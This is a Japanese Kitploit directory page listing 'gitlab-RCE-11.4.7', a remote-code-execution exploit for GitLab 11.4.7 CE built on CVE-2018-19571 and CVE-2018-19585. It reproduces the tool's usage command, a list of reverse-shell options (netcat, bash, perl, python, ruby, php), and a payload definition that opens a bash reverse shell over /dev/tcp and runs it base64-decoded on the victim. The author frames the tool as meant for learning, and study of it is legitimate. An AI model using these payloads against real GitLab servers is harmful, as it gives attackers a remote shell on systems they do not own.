Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
gitlab-RCE-11.4.7 — GitLab 11.4.7 RCEエクスプロイト、各種リバースシェル対応。 CVE-2018-19571 + CVE-2018-19585 | Kitploit
ツール/GitHubGitHub/algafix/gitlab-rce-11.4.7
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubalgafix/gitlab-rce-11.4.7

gitlab-RCE-11.4.7

GitLab 11.4.7 RCEエクスプロイト、各種リバースシェル対応。 CVE-2018-19571 + CVE-2018-19585

リポジトリを見る
335年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

gitlab-RCE-11.4.7

GitLab 11.4.7 CE の RCE エクスプロイト。異なるリバースシェルに対応。
CVE-2018-19571: https://nvd.nist.gov/vuln/detail/CVE-2018-19571
CVE-2018-19585: https://nvd.nist.gov/vuln/detail/CVE-2018-19585

学習と練習のために、Sam Redmond と Tam Lai Yin のバージョンを改変したものです。

使用方法

全てのものがそうあるべきですが、これは python3 で書かれています。

依存関係:

root@kitploit:~
pip3 install requests

使用方法:

root@kitploit:~
python3 rce_script.py -u <username> -p <password> -g <url:port> -l <local ip> -P <local port> [<shell lang>]

デフォルトでは、-e オプション付きの netcat シェルが使用されます。

組み込みシェル

現在の組み込みシェル:

  • nc_e
    • -e オプション付きの Netcat。
  • bash:
    • 絶対パスで実行される Bash。
  • perl:
    • $PATH から実行される Perl。
  • python3:
    • $PATH から実行される Python3。
  • ruby:
    • $PATH から実行される Ruby。
  • php:
    • $PATH から実行される PHP。 注: 通常、GitLab Docker では動作しません。

ユーザー定義シェルの追加

一部のシェルには、リクエストエンコーディングと互換性のない文字が含まれています。そのため、Base64 でエンコードされ、被害者のマシンでデコードされ実行されます。

独自のシェルを追加したい場合は、payloads_dict 構造体に値を追加してください。

以下を定義する必要があります:

root@kitploit:~
'bash': {
    # If the raw_payload can be executed withoud encoding
    'safe': False,
    # Payload, must contain the references for the local_ip and for the local_port
    'raw_payload': 'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1',
    # How to execute the payload if safe is False. Must conatin the reference for payload
    'exec_string': 'echo {payload} | base64 -d | /bin/bash'
}

免責事項

HTML の解析はかなりハードコードされており、簡単に壊れる可能性があります。

ツールをダウンロード